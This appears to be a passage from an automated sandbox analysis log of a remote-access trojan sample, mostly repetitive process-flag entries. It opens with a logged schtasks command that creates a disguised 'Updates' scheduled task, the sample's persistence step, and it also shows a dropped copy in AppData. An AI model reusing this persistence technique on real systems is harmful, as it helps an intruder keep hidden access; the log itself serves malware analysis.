Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
